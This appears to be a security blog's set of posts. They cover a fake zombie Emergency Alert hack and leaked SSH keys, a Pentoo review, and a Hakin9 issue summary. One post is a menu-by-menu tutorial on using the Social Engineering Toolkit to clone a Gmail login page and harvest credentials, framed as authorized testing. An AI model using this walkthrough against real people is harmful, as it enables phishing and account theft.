Will Emergency Alert Vulnerability lead to new Zombie Attack Warnings?

You are sitting with your best friend watching TV when the shrill warning of the Emergency Alert Warning goes off on your TV.  As the text scrolls across the screen you wonder if it could it be an approaching storm or worse, a tornado warning. But not this time.

It is something much better,

A Zombie attack!

But before you pile into your car, grab your girlfriend Liz, then head to the Winchester to have a nice cold pint and wait for all of this to blow over  like in ‘Shaun of the Dead’. The zombie apocalypse you are being threatened with could just be a fake warning posted by a hacker.

This is exactly what happened to TV viewers in Great Falls, Montana back in February. An infomercial was interrupted by the familiar warning bell and an Emergency Alert warning stating “bodies of the dead are rising from their graves and attacking the living“. They were warned “Do not attempt to approach or apprehend the bodies as they are considered extremely dangerous.”

The warning was fake of course, as a hacker had obtained control of the Emergency Alert System. And it could happen again as a new security vulnerability has been found in the system.

According to The Register, security “researchers at IOActive have found that systems used to receive and authenticate emergency alert messages are vulnerable to remote attack.”

Apparently root level SSH keys in some Linux Web App Servers used by the alert system have been publicly released in a firmware upgrade.

This key allows an attacker to remotely log on in over the internet and can manipulate any system function. For example, they could disrupt a station’s ability to transmit and could disseminate false emergency information. For any of these issues to be resolved, we believe that re-engineering needs to be done on the digital alerting system side and firmware updates to be pushed to all appliances,” said Mike Davis of IOActive.

Not good, as many rely heavily on the Emergency Alert System. Especially in areas that have strong or unpredictable weather patterns.

Until the situation is remedied, if you receive a Zombie Apocalypse warning from the TV, think twice before you grab your shotgun and head down to the cemetery to play Left 4 Dead 2 in real life…

Pentoo 2012 a Penetration Testers Distro of Gentoo Linux

I’ve never seen Pentoo before, but couldn’t resist taking a peek when I saw it mentioned in the Defcon news briefs floating around. Basically Pentoo is Gentoo Linux with a bunch of security focused tweaks and additions.

I am married to Backtrack and am not interested in switching to another Linux Security Distro, but Pentoo does look enticing. It is loaded with tools that fit very well with a pentester. A quick look in the application directory and you will see the programs grouped Backtrack like under headings like:

  • Analyzer tools
  • Bluetooth
  • Database
  • Exploit
  • Forensics
  • MitM
  • SIP/ VoIP
  • Wireless

Under each group you will find a slew of programs that would make any security guru giddy.

Tools like:

  • MSF Console
  • W3af Console
  • Autopsy
  • Burpsuite
  • Nessus
  • Aircrack-ng
  • Kismet
  • Development Tools
  • and many more…

I really liked Pentoo, but as the developer mentions on his site, it is in Beta form right now. Several times I received errors when clicking on menu items. The project is very interesting though and definitely worth checking out!

Backtrack 5: Harvesting Credentials with the Social Engineering Toolkit

The Social Engineering Toolkit (SET) included with Backtrack 5 is a great way for corporate security experts or penetration testers to test to see how well their network (and users) would stand up to Social Engineering attacks. With Social Engineering and Spear Phishing attacks on the rise, it is very important to educate your users about these attacks.

In this tutorial I will demonstrate how SET can be used to set up a realistic looking website to harvest e-mail usernames and passwords.

Okay, timeout for a disclaimer: This is for security testing purposes only, never attempt to use any security checks or tools on a network that you do not have the authorization and written permission to do so. Doing so could cost you your job and you could end up in jail.

  1. Obtain Backtrack 5 release 2. You can use the LiveCD version, install it on a new system or run it in a Virtual Machine.
  2. The first thing you will want to do is update both the Metasploit Framework and the Social Engineering Toolkit to make sure you have the latest version. Update both, restart SET and check updates one more time.
  3. From the menu select, number 1 – “Social Engineering Attacks”
  4. Next select “Website Attack Vectors”
  5. Now “Credential Harvester Attack Method”
  6. We now have the option to use a web template that will create a generic website for us to use, we can import a webpage to use, or we can clone any existing website and use that. The included templates are very good, so let’s try one of them. Select number 1, “Web Templates”
  7. As you can see in the picture above, SET comes with templates for several popular programs. Once you select one of the templates, I chose number 2 – “Gmail”, you will be given a short message about username and password form fields, just hit “return”. SET will now create a fake website using the template that you chose, and prepare to harvest any credentials that are entered on the fake website.

And that is it!

Now if we go to the victim machine and surf to the SET created webpage we will see this:

A Gmail login screen! But wait a minute, take a look at the address bar. An IP address is listed instead of the normal google mail address. If a user enters their user name and password on this site, their credentials are harvested and collected on the SET system. So as user “Security Joe” enters his credentials, we see this on the Backtrack system:

In the picture above you can see the user’s name: “Security+Joe” and the user’s password: P@$$W0Rd!

When you are finished, hit “Control-C” to stop harvesting and view a report of all the sessions that you have captured. The report file will be stored in the SET file directory under Reports. Two reports are created, one in html and one in XML. The picture below shows the html report for this session:

As you can see, unless the user checks the address bar, there is no way he could tell that he was on a fake website handing away his login name and password. And as many users use the same password on multiple sites, this could be very valuable information for a hacker to obtain. That is why it is imperative to educate your users about Social Engineering attacks and how to defend against them.

Hakin9 Exploiting Software, May Issue – Buffer Overflow

Hakin9 IT Security Magazine has just released it’s May issue of Exploiting Software “Buffer Overflow“.

This month’s magazine features the article “Recovering Passwords and Encrypted Data Remotely in Plain Text” written by yours truly. In this article, I talk about recovering remote Windows passwords in plain text using both Mimikatz and WCE.

I also talk about the dangers that online attacks can present to file encryption. I show how a Java based online attack can easily bypass and recover encrypted files without encryption. Even thought a file was protected by whole disk encryption and the file itself was encrypted by a separate program, I was easily able to remotely read and download the file with no problems.

Craig Wright also continues his excellent series with an article on Extending Control, API Hooking. API hooking the malicious code is used to vary the library function calls and returns by replacing the valid function calls with one of the attackers choosing. The article follows from previous articles as well as goes into some of the fundamentals that you will need in order to understand the shellcode creation process, how to use Python as a launch platform for your shellcode and that the various system components are.

This article includes a section on functions and calls, extending DLL injection and then move to the actual API hooking process (that we will extend) in coming articles. With these skills you will have the foundations for creating shellcode for exploits and hence an understanding of the process that penetration testers and hackers use in exploiting systems. You will see how it is possible to either create your own exploit code from scratch or even to modify existing exploit code to either add functionality or in order to bypass signature based IDS/IPS filters

Also in this issue:

  • The Basics Of Buffer Overflow, Fuzzing and Exploitation By Richer Dinelle
  • Exploit a Software with Buffer Overflow Vulnerability and Bypassing ASLR Protection By Ahmed Sherif El-Demrdash
  • Danger of Man in the Middle Attacks to Modern Life By Wong Chon Kit
  • E-mail Spam Filtering and Natural Language Processing By Yufan Guo
  • Security Communication and Why You Should Trundle By Dean Bushmiller
  • Overriding Function Calls in Linux By Umair Manzoor

Check it out!